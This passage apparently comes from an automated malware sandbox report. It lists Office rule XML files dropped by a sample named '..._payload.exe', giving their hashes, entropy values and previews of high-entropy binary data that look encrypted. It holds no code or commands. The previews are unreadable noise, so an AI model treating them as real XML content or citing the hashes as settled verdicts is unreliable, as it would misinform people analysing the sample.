                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1711
                                                                                                      Entropy (8bit):7.903603921329639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3IWvAVxlqhkwRB36+/qGMM4fnK091EEwD:4LxYky6qH7Onu
                                                                                                      MD5:D4FD619AA6AB36E8A62D6C9CE7AA90CA
                                                                                                      SHA1:3205B463BC49F3F051E84641B34F7B79FF5A0A8A
                                                                                                      SHA-256:B7465D614C98E59CE56616AC6FD129181E50CB41824E3B2C55E821C9D2F8E535
                                                                                                      SHA-512:9F76894AB94E9443160BF96172D52EBDDADEEBDC7F5CBD4725CDF3ED99E3412610B87FE6AE31C9A56FBF7B2621D779CEE23E424F50D2586EA99DF1BC9C3CDE29
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..=3O..]..a..[...W1:bS........(.X..u.l.......I4.....K8./.'....s.....o......).w....!.Ej......@...4.r.........Z .X.`^......Pz.U......1./..r.d.KfLod..p.u...I.4.PI."..2.8.W.D..... .cGX}...;..P.....2.._.......c.'n.`*...{.d.Q.u.H.i..sBz!...j........;$.... .]..I|...=..X%.5.....+.*......"F..F...rlM.A.../cd...Q...C.*.:.............`..d.Fn.e....$T.........W..3h.....1...qh......).........J.....2.@.>.t..+..8QIh6. ..uMeTo/..*.......(..2..\.....K.yT$.W}...:...(.@]......_.=...dN.p....%;.wbc..X........Q.[n:..k.Z.>V.@.;.`9..RN.)....?....P1.dX.... .F.q..N...,...D..;.|..;.......x..$..(...!.(6.y..lM33...[[.......<O.........n..<$.m.5..b.l..|.......IE.....e..4D.e.W.F....z.M.....*r...P.....T.....T.~:.8.V.p..Wi..d.~.C..a.......Z.'.twO..f..h[_.".:X.O.,..a!.<F.....*.^P.......TUu.H.v7..i)....:.w. R7..x..1..(M<..P..........).?y.....V.....T.......8.......}...e$<....4..@.....m..&[s8.....m8..-Q..KT@+...Z.m.. ..!\.?....{B[...\G.f.........|.hL,...~......3@.\H].

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1748
                                                                                                      Entropy (8bit):7.890624811900034
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:/DbTcF4gjCDnFmK/TmSof+AvVO09lXEBdRT88wD:/LcF42aFJ7do2SVO5Bdd8F
                                                                                                      MD5:1A4135FD48A0A97F5D20FB093FD8F375
                                                                                                      SHA1:CDD032C7BA4DFAB8C3B04793F063FC28CF04D5BB
                                                                                                      SHA-256:4A20A59968288E3B726846011ECD85DEAD87BF47FD95B1DF7A0046D19C61B9B8
                                                                                                      SHA-512:9F4076F78BEAFFDA780836EADAB9E837119E4B76D654E97C4585D5D4ECC4E20DF7E733910EB4FCE889406E1AE9175612F2C15127D7EB900F9937CABE396FAD97
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml6...kb.rR5...'.....y BD..4K.. HG.9.E.D..h.]5`J...Vp.lEp..>s...[....N.|..a.H......M..B..QV._...6.a./..!sY+.-...9.....N.hh.....{...{..58.../]<...|wT'.0....~9.....TV..8mJ.=t.:@...b..8rG>>...d.k.j./EW|c.X.e}.o....V..m.!..s....3,..C..U...{O...=...7M..;...n.........<....Y.1R..G..oH..m..)...r..F..........l..K..bV .x..M9.Z].U.[......B]..C..:..;<..P......x.;.d.f..db.[.k..O.=.]}.x.N....m.......iFJ7.(.t.K..G....j..l..B.B.....]D.f...v.z... ....I.....s....+...k26.P...axC....U..b0..0...KZ..z6.qr.N4.3;4....u..i.G.vdC.-..N2(. #....N..Lhc<.:.K;..g...UM.....t/`....A.$N.S...].....A.F...7.g.....RG|....t,.%..YL.p.>.vdX*<.}.......|....._.`.....;.._f.x..Z....4..<...'..u...e.*.^$%QX6`..-P%.5.{.....u.r.Q.x....?*.NkT.49.Fnd./)G.S.;J.ma..).gj..@.........N.r..-.."?..89{.+-...Av..d,..C.Y.k..........D:..7#.\-0.......g...l.R..=.+F....{QW..\..$y......:..\O.)Pc.-.?{.).n"_.......7.~.d..........3.o Z.^..,4d..'s.......}J....5.K....\.Z..y.....s.C.5..@.L.#......~...1.6./...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1705
                                                                                                      Entropy (8bit):7.876397375223899
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:knrijnJY1TxvYseWhwjUY5wa0VZnPsmUyfgSEMYowD:k+jMxvbeWhwjUYK9ZnPXUlMYx
                                                                                                      MD5:F5AC5204426A63BC853057DCB1BB813A
                                                                                                      SHA1:295952624C59579E41DDB583A8DE1FA4C24AC074
                                                                                                      SHA-256:19863C666629E4D5A96ECCA5321C96F5A6FF06D9052819FFB6D7FA592BAC26A0
                                                                                                      SHA-512:C2D692A9CE46437F4F580C2CCC40C363714577238DCD7463FE210277EC9A3086DAF1D41B3C638F7FFAD774F90B19D39408254199F1AABF06B6E4311F4758F77D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.uU.a\.pZ..~....~]....3u..r%H....R.c.....8......u*^..bq:bkZ.CW..U...6H.....R..A55.^...S....y....s.../$."b..... ....._..f."......1.S$..IV.W.$XR.....o.q].T....Np..mW..H2|.7..i2...@D@....Y..5@_2.t..~.I.d.@O...={.g..kC.....7.H..a..m.../.xY...h...=.I.....)..-....R|.. 6".-.%.F.....[..%ED......{(.].7......1..<r4q.".d..|0.bb..r.'%..J=H....}..P...t).......x...J+...;...."6..%.^&!L.$.~....R.m...X.P.`37..........LM[r8'.p[..........8...v.....O...&.....eB0......P..I.....=-.I3K..f..]n..h...f......x.....$=s..t:.r3a.G.lH!...&.kd.8...e...Y... ..'.ojH.pX..+....M...me...rI..d..Z=.{..%7.(.r<.+..]..c.....R.....zgn.=...K.o`R........<...-..{..fe....U~..?..l.......k..y..PQvI..f...<...Y......_.D......u...i.}..i.\q..8;.h..C.GMm#.s..[K....a.-Dm:.U........U..*.Vs.K.VW.+..O.hR...!..s.X..j.mi.]q-.$.~3.....C.#P.j.7+ P..c.'.....^/.d.'w.Q%...b..U.c.....y....Z...T..g.t..P5...;v.].C.....u...m......7..Y.n...y.!._".....q).5...5Ei..Bs.=<a.2q5.j0..k..`......{.=..w.Y$a

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1742
                                                                                                      Entropy (8bit):7.881504016704348
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:4NoVhUlq9iT/hnILQ8dtkqPFQ2LVgnySQYft2cGMOHB8TwD:4NGylrILQ8dtHPBgn3mUCz
                                                                                                      MD5:A9248297D38739D110B476233859E829
                                                                                                      SHA1:D0A88887BAF18F52295CDA0D3485DCD846CFB7BF
                                                                                                      SHA-256:264DACD53E86673E3641A29096F8C965F396F1226981409BCF17DB5D3C933BF1
                                                                                                      SHA-512:6F8EF6BCB14736A7EFEF11980560EF865154FBD14A5246DA282885A20FC1F4FD7D4D5CD6C59EF2F7171468471164619877FE9F9A4109EA6BC0A66B3F33A858A3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml._.....e..........F.I.@bY` ..g.......w...N..S.......y....H6..+...E...g..z}k........~p..V.7....W..hv...n.V2.......EM.#0...N.e..>.-...9..z.F..H.......+.Cz..,....R6..X..~.[zN....+x..$.1..y<.k..Ek.......x..9.?w....nF6P..Uc..._=c...+p.-V.....b.z..E%g.N.n........<...Q?...tT....g..F.;`H=..dW...E..;....[a............b.g.P.e]..e...Wl......{....7.9.x..;.NFC1.5).......vg.t7..%....e@%.........p..A.F`U4...Q.t.......]...'Y.=.?.a.S..y.H.....<......./Q....Bs..iV.@.j.,xo.....I...a...+u...5.....,....."...._r..^...hQ.."...P..O.I...2...P....f.u.b...Y..Q.e.S.(7.`..2D..%.9.Y...&.g|.....p%3V.mP[.u.T!..M.L...{...b....za.8N..aEsjR**EzE..^.....IyB.......9*.*U...J...~+f....8$...nG.|/|..S.$>.".....]0...C..x...z....._a.....,$..."..tq.D<.`....U.4..tk.Z....I...7..bq.VC...c.`..\"3.....f.=....;.Z.b..n.CN.)...e;.._....C....[....Qr..2UA.....Zd..^.....2.......M...$.$rO..g..f.<=...b...)..pA..Ru.W.u.t....U..V.....n:...~..K1.B],]D.b..!H.,...[...._j...Ss.O+p...O

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1691
                                                                                                      Entropy (8bit):7.873136762638331
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:pOhNd58qnI1e9oYi+FEvEjyC30lbjUTZYDV+mhwD:pOhNd58qIEoY3Il+0FjUTMV+mC
                                                                                                      MD5:0E3072C9A0FE527045D59E0D21569D87
                                                                                                      SHA1:110AD5A23DB649E5116AAA6E8CF2545ACE94ADE8
                                                                                                      SHA-256:7A0FBC5E734FB702FAB39361AC018072580D9D30C1F0F70A1D29B59FB9B9229E
                                                                                                      SHA-512:5910F94BA7F2305FBC974A3CDD268B5117E904D01885706720472213ED88A86DBC60A45F09AA049D8753DE4E572D01C9E6034849508321649074523CA8EEE6C9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.}s.w....T..6k%W...oY...;@a.`"dM.,..uu..^\K....=]....1.3...o..a3<.j...J.N!..8H..M.{6N...Q..4......!..+.8..k...@;.1....kZM.o.C....7~.......!z...l*.C.%..5.~.}v.s.{...W.X...d.$.r(.A.u..!..%...T.<A}.C....6aJP~3..~...1..0......T./..9W!.j.R]....;3..JL.+..-..%y~...q+&...S.7.....K...P..0...W....3\b..h..Fp.........`.......r.{.'?[zv.L.....]v...+...U...$.....o.xH.6..xRk.(..]..i..........Ra.d=.%.........l....k.wD3..>.l....1..h.7...Q+...[.Z..?.0.Na...R.....I...8.F/.....!JH....'......Wb..y.><-_.....i|=.?T..}......Lv..e..E@.yT..%......t.....1Y..o.....v33.S.......*......>]..A.^.~........%Z.E.w.{.a.g#.NF..M/+.:.:BBV .;$9U..n...BH........B...#.E..<..).U.}.$.9W.u..bZ.JW.*.6) ....6.nb/.).a2....4.@..;.....8.L....A".....s...O..d.....O......X;.*.b......7O`vJ.8#...C+.......b..e.G......_d.}6u..L.....*....'o...}...Rn.5X...{;..v.pm.. .V....'...OU&.:...y.$S.+9|5..h..7...%..0c.U...dW....s.dV.WG....._...,.N..;.....o.....-.6....om..Q.......$.k..n.nSU.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1728
                                                                                                      Entropy (8bit):7.879351912638456
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xomwcODQeyzGkW/lj/aXgSiF/jDHt96chRkkowD:bDO0DWZa3wOGx
                                                                                                      MD5:E7E5C4F92238F39C01CAB8A88F30D19E
                                                                                                      SHA1:1CAB0A1D798947E3134A69278E7167BADEBCF58C
                                                                                                      SHA-256:9608924BDF392AFA1746E898DCE7B4409DE0A8F90F198DFBCB79FEEB6BCECFDE
                                                                                                      SHA-512:87EFF946B2ED98CBA4FD3924C241504FEEAB6FE8C9DE1E5D97AA171769DB10FB9E08D05EC4443FCE7D7F9BBC85622C024DB88BEDD29E7B8986CAFAC30E3171EB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..<X=P...+Gm.M..C).......1....t..4.'.v...j..O...s+x.H.R..b3.....}..7..T...~..rp..n`..<P8..h..r.@.....ARR)..j.zb.+...+.$5no...&....F.B.=....@.!|l....Z.y.1.Y.B..&...jy^^.d..L...S.Zb..H.X.b..FD.....s...Y_d......`o.5..W..q....l)..@..0.-;.hja.Vx..'-....k.XeE{..&.p=JW....[.c.z.....i.\xbW..Fc..p/m...q.*,....+....m.^w7.e..M......5\s.G|.o.............}:.h..$vfhk.'..Rvt.u..K..@..j.Q<..........h.......aPV*H~9.....jscj....}H.>...$x..E...'H.)....2..h.H.l.j7k.q.!....W..~.[{.O8.!..<.% .R;..(..<...2...(....;N.,U.CQ&..#m......./.Q...%c..B..t....S.n...e.I..y."mW..A....K..3rFy....0~..o.>....dCD.x.....<X.`..y.-...P........qa.:O.blEK...!..Qj..v..v]........5......;....A...Q....3...&........g.Q.O..x59.3......co..0....Q..gO.Ps..=w..&.!.{T.U.+..Q..C.m.'.@..Q...T."SK.Os..y .=..*..Cl...m.J.....S@.x.$...<6..Yr.0..p.w-q..vI..6..J.n...&)K}......+.M8..f..E.B..;.c.y........+.$NN..pB.`.m..c...z...f.Y....T....3.....$.........3...6.|..G0_cG..1....F.a.$.(7...ty...*.;.g.l...I..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1700
                                                                                                      Entropy (8bit):7.8772016856748746
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:fFWclKZGCtmopajeoSptdiU8rYUZ45u89pkXmZHz6rjJ/7wD:YoKZGjo5oSpuU8Uy457qiH23xw
                                                                                                      MD5:9260C97C2116C357D9151C5C82808C97
                                                                                                      SHA1:F6BA1B87C0D9C93CA265E760F5488360932317E0
                                                                                                      SHA-256:2C27FFB03EB89A1561768F70655679C4F0A81364CDBA03843712C2AF913C0FDA
                                                                                                      SHA-512:78ED1DF151BD07BC9830EEEC9D1D85B14D39D4C5745924E8F9C0954BB4B52520A9B3653135589450602475C469710BC6D8AE1576B86A60143F193EB87B77B03E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmly.}v[T.......@...(....<..4&......xK.6.8.8m....^...........l....;x.P.v52..owz&.....?|.R.....6f......F...?....../....{.Q.3{#....&...........o0j^n....T.....~z...E.r.|...a..N.u.r..h6.A..<....8b....p.V..r.<....&..8.K..U..!4gD[.Nr..k..g?.S.S.Jy%....]JN("...t..S.q3h...x.DB...$Oi.1.{wi.'.r..s..bS..'l.p:,h.,U\C....p....R.....q....<..)..........@..|.....A?.Yu.}.(...t...3}fA..8r......|....r....r.......j%3..x...a..+...fe.l...%..............Kk...D.Z..m.U...........?<...c..q.O.B.d.../d.M.K".'..e....F)..{......6..A.#.2.....g]./.Ss..t.bk.u.P..&..(Yd........>b.'$..&....G;.~>.p.p...*7...l)...o<.,.S...:Xa./.....c.....n...h6}.......3.....\...X.$.. 3....IG.r..D...S-.m.$..1S..S.h...3g....E.NP.-7*...'F..?....w..<...1s.....q.M].6.Da*#...:.,..Uq.bK.A6.2E....'y...),..V...Rh..)t.....Wv...WB.T..|.]j&...h.o)..hX..m.uf.G.y6k..PY..=.R2R.-...%....U]......l.T.)x...Y....%..z...$.i`.x...y|i.......P.{X...1.,.3..`l=......\/l.7.S...~. lT<......}...L.Wv..-....~.n.....Q...;V.........S.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.878963516280737
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:m5b6s87E+/+LuHo1yVmI1wVXKaaSAuaYLdYkZaCv22vfIli5we0SevAHYx/wECEb:m5+bqd8RabKAabegs5wPkgYECEMeAwD
                                                                                                      MD5:4ACECAB8F00AC147AAC9E951985D6A9A
                                                                                                      SHA1:35E85DE889018945EB7F5010936D342E8CC440AE
                                                                                                      SHA-256:2BAAE28E58518703E3AD214B3C7A8340BFC307F879CCE468EA9E073B57D2B76F
                                                                                                      SHA-512:5B04F8E4D4D081D6EB89DB39005DF402725A9CECB6E6FCAFDD6DD59B2B7C04D037E5783051B9FEFDE74CA5A9EA5B1AC63376BEB94E258ADE38D95B2A85A37594
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...u._h......D/ED.|g`~.8..?9...zt..J...uh..0...b..*...H...._.~P,G.*%..4..x....'0:.\h.l`X...G..........s..s..p...X5H.B>...!HFR.Kb.......M...j.@...B.....x.....B.6.v.%[.6s}..6....t.s...x..._.u....W.p;n...|}gu.@..#J....V.A..0...o}g.v...|.....;.#e...........D..]....?[..A.L...A.......u}t.i..];.....&b.....qy.<..>g.L. Y0...&..@Zig.}..0..@..~....P..n..o...Y.R....../.dC.w....D&...(....&.;...U..C...O8....L......!.L...".......S...........T...NT.:y.....ik.......h..5..6l..h...........a..y......4....).s.!.....x.....E.F.....,.0.:q...=...x.4...TT{...|\.....Y..E.FE..b.eo.F...nC[jD.......2Y6U.;C..wy.YY.@..m..0.l.W....iHQ\...R..v..pg.n.3..-7;Y..d.I:[m.,.|dxYK.$........*.-.{.Z.q..#ip...........~>4........B'4.......+l\......@r[....>..W..q.3.n...B...z.I.W.u.O..o.....*.......}...L...U.....h.0Q.G..>.V..>93`..#~...w.T....aB.^...m.9..4...8.Y..z..|.....q...|....v..2kg....w~.YZ..L&z.7.%...*x}.~.L...*..U...PJ.O.2.....V....q;i.T.W....+J..././...GG..".P.I..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702750v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):7.894491031378823
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:RZRcS8WLHp5wZDk3232KdtbWQS3GXlq9tcnrwwD:RZlJ5wZDkG31dV5Sh9tEp
                                                                                                      MD5:B69A5C51B59DDAEBD99D2D9C79B88223
                                                                                                      SHA1:4E7D5DCCA094A07A92CD8E4F76D87E5232DCE732
                                                                                                      SHA-256:1B1B96F85C3D14FE4A6CE942E0A493FE43154CEB57C6909044C31BDE8C08CE81
                                                                                                      SHA-512:3BB484DB3770B0C9A90B1F01EC5E7E55271766FC907F0CFDA7BCF6A1E58D2B16132EC8B66F81402AB27A8E8D60E2BABB6B52D475A966DBD06AB02233F739433B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..G..K......z..B.)jt......./..;...:b<...x.T......>h.59..,}M""....C.............h.T3:H...5.P....r.....H=.e.S...$1 0E.`.v...5.....C*I..(.e.Y....5.4.d....e|.m.........\.'.....8%8T....uY.....M.9.....s-].M`.=r....w.#.MR...PjW.(I4...T{........_K.F.j..TjN....d|.._.;2.WH.6Nx....'KJo..O..9%..|...&E..U.....i...........P..?]>.wZ....,)..x..B.|...Z.._.9J.z..).......<C9.$...5.Z....:.IOZ0.`...(.5.eKJ-5.+..0..p."..Wq.!....;.<A.....x....}...%.Z5.3......dq...0. /..u..g...;?G-KJ.V.F.iE.N.......g.-.dG.J..C..T...<..p..k.#..L.Z.....?>P......J.N.uT..o.:.tK.r.pM..o*..j. ........si-......y4....p32g....q/}}.R....}..;....<.t....t...w...3.......a!6.^....{..WBVY..l.. ....VK:..Y...}...Qp1.7......fp...N...C\.i......I...!Q!!..Z..2;m..3.....{u.....%......k...lm.,..>.Wk.......y.7zA...U.X!......fqw.y....uf-5|^...+j...EV#...........AC.4..f+.A:I.O..;.........c.D.......:c.J?y.r.".(....R.F9-...MZ.P.....f~P...)...Kq"...^..}.y...0.U...U...s...\.K..g..N......=.........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702751v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1736
                                                                                                      Entropy (8bit):7.872457115816818
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:auf2kgzNuwQ2Qr9quyi7hTgAP6VlMdWL6SlOXdwD:tfs4wQnWv6W6O
                                                                                                      MD5:71CE5FAC718B586AE6526223E692B44E
                                                                                                      SHA1:F47DEEA935B6F9131D9C93A7F6534C634298BAB1
                                                                                                      SHA-256:4EE202E902D35D4EF2009A19B86616E9B344B87291FA10473F0C93DE46918CF9
                                                                                                      SHA-512:74C6B811F2FEA4D4D58D0A73DACB4AB127959B195CB2847C089C4387C644A81E9722B234B8F8ADBBF25C891F22C0B5F15E5549729A537CECEF03AB0268CDFCC9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..k..DQ.l...q..,....X..`.b..E....\..951...4.Y...B...9p..Y......2x...Y.t.....K.7...h0....y.<E.R..H.v...o..g...rN<...t^.p.M|m!..P.....L..A......o...D`T....H..k..H..y..5..n...I1.A...9.]!.....<....R....[..p4kC.m..uA.0u./7.....{$r...J5yx............!e....H..b.5NG._......@j...(........e.k...i2..le}..{w..P.y.)F?.t#S"G..............i.7.Z.o-..0....9..#..2[G..-[.R.A.o..-...ik]&,.=.....Yf....BMa....M..^"~.......p./.S\....8{...2../Y.A5y..._.)...EB...3 ...t.[.c....}:.iV.I.j.c....]....y.,..T./....q...a<..aC..U...D;V....=<.....T.._.._.f....-.tIF.%Jhvr...+....~....5...'..:7...p.....Z.]n*[..S.../RT#.r...5:..}.?....../.-.AR...Z...s..7.2....@N...........$I.A.p.y....z.$.h...K.Y&..DA....=$7.*./..30.....,..'Ol..^M....!..)...........0..... .%.._k.*l.Qm.f.y...>.a9...aW...ku.U>...O.d...j.f.....4._...B_4.h.!....Y.....P..g=...6Y?r..H.?... .~V.....j...oqo..k..e{4....Ka.2..A........%.|m....G'.i..U...qz.~^.^E...3R.^#..+.01..]...l>...p.....^...YiTd.S..gj$.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702800v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1687
                                                                                                      Entropy (8bit):7.880820485810954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:UfpnOHqBUzTShmhe2YUXmmy4hno9lX4/9rZ1wD:Uft/GPShef/Zy4ZVVlW
                                                                                                      MD5:33E4ADE0DE8CE980B64173A807251C5F
                                                                                                      SHA1:3CC229BAAA23A824D97BB592229C87ABC675FCCD
                                                                                                      SHA-256:25D181FA8BB5E9EDED7BC0CBAB513E5CF5E6A7EB1FA12B604EB13F38FCA5FEF4
                                                                                                      SHA-512:ED949225BCC46D532E41ED91A587010CC67B30ECFDB53282511E17CA2AEA42CA4EA055D7C1F4E00FD51FA28B5567134BE327B297554FF210F5BA653D4BAFD716
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlF...f....i.Z...v.N4....s.dR.]t.<.#...?...)7..7|.k...R.OiPZ.,`..3.j2..NG^._z..s.....I...>.Y......sxb.....3T.R$..A+4..j...=ih....O.-.h../h/.._.c/,..7.f9......s .-.gO.i.x..vv`S........_..1.b...J..]..By.f...x.<)/{....Q..B+%.<_...;...Y...,....e.t.Y....9$..q.%..!....y.M...Y..o...-.G."{.]..Z)..n...[?[nS.5f^Pz...8tG.....i9..i....mJ..A?....A...'...1C.b..v.p..._..a5;1.v..Q%.ai.......}Et.....5.P.cY....@..}....^H.Sa%..l..%,.D.M.E...........q.!r.E.22.....m....R..q.dY.=0..[....n..*......}..H.jN..E...M...,...q....]....o.X....Z.z'.... 'nG./.AZ...p.x...m!...LLwo"...".tL....r..+l.J....M....U. I].cK<.;..;.V...1.....{g...(.wa.2....6..4.I..6.Nbm.r....._b*..V.<.E..9.1da..`(c...(....L.\v.6.?..E.$.^....T.\...w..s..+L...x%mC...H..z+..wM=J....-:%:1....N}DT...T. .. .v.2.b......ug...vQ.3].$....k?.%.....I.5... R.-.w.q.....jLx..a.I...WD.k.>...i...&S.e,2.s..w..=./...7...[I..Ho#..gU...5"..\.1.........9.......+..Y7......,.L.%.....&.7.O.n.F..8.{.i........i....r..z.E.!....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702801v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1724
                                                                                                      Entropy (8bit):7.891260174903676
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:het6O5qhVO/V1+5BE7zWNCUCIc1loI/xGaH3oGrnwD:AN5qzM+XizqCIc1BGaXoQs
                                                                                                      MD5:2AA27B86BE2212351BB96A785EC7D3F7
                                                                                                      SHA1:F75B6A949FFC4453096ACC58B8B7E503B24F7578
                                                                                                      SHA-256:B23145A5A9B479C4D9DB1B6A3695D215B26013FDD21C31C23CE4BDAE3D4F6A9F
                                                                                                      SHA-512:18EB1042778FC563475CEAB38D9C7D174AB6B8E5A56DF986EBBCD77D8E5818991D25DDC4ADE5734DF4CCD3B78C23301F9772C12B9259FBCBA4EFD9DF56C45ACD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlL.....08.+.....{.xI.,.m...]1E.K.{....i.`...C......mk?....7.0i.....3.}.qyx.<mC...6....V.!.L..w....../..OL.iU._v..2...Q.].@1i.{..H....@u=<.7N.o...JX!\Y|b...e...I.'.E....j.(.....j^....8....eA.}.!7...(5n`.s....V....._..W..C.rh._.s.....?,......fsF..3~.N.1...Z=k\8s.d.Y,..e..7.X.} ......%ij....:.:..$..o.../kn.z....U.s]l9..|......[...G..-j.$\.......w.PQ9...Z.j...X......A..{...j..I.....\...z.Q.....DX....~...x*.......7Y....`.5.:SA....`&.UD....K..OgC...ob......;....H8...L%:..Zc...IcK.S...&.H ....E.V..-..;...<._^j=.=....@.L..(.z[.l.....8vW..!.R!.$.s.SLO...V.3j>0e...S.:.~..........2.r\H.D..}.!.5.^@...w0..$!..yX.DW..9.F[.o..Bq;...........[^=.9.i.......Q..t..... .\..3....4...'ac.:gV.e...z.4..(I..0.?..U$1.@,\...utB.u..Y.=..?._...z.+80..`e+.(.x.S.....>.t\.Dqd.....m.p...sb....H.r.~..e....Rr"}.6.0..L...ch...........0..bt..f.g.|(s.=..+.%....?......k.....1..]y..n0@.%.J..S..C.Z.,t.y..fet.2..y.h.Z.?...=..<..`.P....../(T.[.u.2Dqi..&.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702850v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.886663129596268
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:kmDv4f/JvF4xqZ4eUvURUZcTFgJ3N/6jZ6mwD:3Dv4f/JvixqisRUcRnZ8
                                                                                                      MD5:5AD6F46F28E3BC32A6549607772F3AEA
                                                                                                      SHA1:EE494E695DD014DBDC84B38F83B70AAC24405C6A
                                                                                                      SHA-256:9731962BCB7B0D588292D889D69195C30C1DC265C81B7A71A53B4ABF0686418E
                                                                                                      SHA-512:47C06C97B9070D1AE6DBBC3A52BFBE9B7F6E313D7A1C512AC29C81687BE6BCD493FE2C9F16DFC4D3EC5F2B8FE481C3D55DEEA900F7C150363BB0EA8F27FE43A0
                                                                                                      Malicious:false
